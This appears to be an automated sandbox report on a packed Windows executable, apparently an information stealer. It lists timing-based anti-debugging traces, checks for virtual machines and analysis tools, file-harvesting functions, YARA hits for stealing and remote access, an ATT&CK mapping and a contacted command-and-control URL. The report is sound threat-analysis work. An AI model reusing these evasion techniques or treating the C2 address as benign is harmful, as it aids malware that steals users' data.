                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA8D second address: 111EAA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0640D82066h 0x00000009 je 00007F0640D82066h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EAA4 second address: 111EAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F0640516B3Ch 0x00000013 jl 00007F0640516B36h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0640516B3Eh 0x00000020 jl 00007F0640516B36h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EAD3 second address: 111EAE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0640D8206Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EC24 second address: 111EC6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0640516B4Dh 0x00000011 jmp 00007F0640516B47h 0x00000016 jnl 00007F0640516B4Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112640B second address: 1126410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D463 second address: 112D467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D467 second address: 112D47B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jo 00007F0640D82066h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D2EA second address: 112D2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D2EF second address: 112D322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0640D82066h 0x00000009 jmp 00007F0640D8206Ch 0x0000000e jng 00007F0640D82066h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F0640D82073h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D322 second address: 112D326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D326 second address: 112D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112D332 second address: 112D33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112EB33 second address: 112EB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1133878 second address: 1133894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0640516B43h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112AF47 second address: 112AF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113F4DD second address: 113F4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1142364 second address: 1142368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1142368 second address: 114236C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114236C second address: 1142376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1142376 second address: 114237C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114237C second address: 1142380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114209A second address: 114209E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114209E second address: 11420C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82072h 0x0000000f ja 00007F0640D82066h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115190A second address: 115190E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1151BB1 second address: 1151BD2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0640D82076h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1151BD2 second address: 1151BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1151D36 second address: 1151D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1151D3C second address: 1151D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640516B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1151D54 second address: 1151D68 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0640D82066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F0640D8206Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11520DA second address: 11520E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1152245 second address: 115224B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1152645 second address: 1152649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1152649 second address: 1152671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0640D82066h 0x00000013 jng 00007F0640D82066h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11552CD second address: 11552D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11552D1 second address: 11552D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11552D7 second address: 11552FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F0640516B38h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11552FA second address: 11552FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11558F4 second address: 1155900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1155900 second address: 1155981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F0640D8206Ch 0x0000000b popad 0x0000000c nop 0x0000000d push dword ptr [ebp+122D23FBh] 0x00000013 mov dword ptr [ebp+1248A4F3h], ecx 0x00000019 call 00007F0640D82069h 0x0000001e pushad 0x0000001f jmp 00007F0640D8206Eh 0x00000024 jmp 00007F0640D82075h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F0640D82078h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F0640D82071h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1155981 second address: 115598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0640516B36h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1156BA3 second address: 1156BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F0640D8209Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0640D82066h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A04F4 second address: 57A04F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A04F8 second address: 57A0527 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0640D82076h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0640D8206Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0527 second address: 57A052D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A052D second address: 57A0533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0533 second address: 57A0537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0537 second address: 57A0552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640D8206Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0552 second address: 57A0561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0561 second address: 57A0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A0566 second address: 57A056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C322 second address: 107C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0640D82079h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C347 second address: 107C34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EBD9D2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 106CA6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EBD8F7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10F6E22 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-37638)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BE40F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BDE530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDF7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BE47C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BD1710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BE3B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BE4B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BDEE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDBE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDDF10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD1160 GetSystemInfo,ExitProcess,0_2_00BD1160
Source: file.exe, file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.0000000001918000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36473)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36450)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36453)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36465)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36338)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36505)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD4610 VirtualProtect ?,00000004,00000100,00000000 0_2_00BD4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BE9BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9AA0 mov eax, dword ptr fs:[00000030h] 0_2_00BE9AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00BE7690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BE9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00BE98E0
Source: file.exe, file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: )Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17588 cpuid 0_2_00C17588
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BE7D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00BE6BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BE79E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BE7BC0

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6316, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count of report signatures mapped to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 12 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 334 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Antivirus detection (Source | Detection | Scanner | Label | Link)
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches

URL antivirus detection (Source | Detection | Scanner | Label | Link)
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
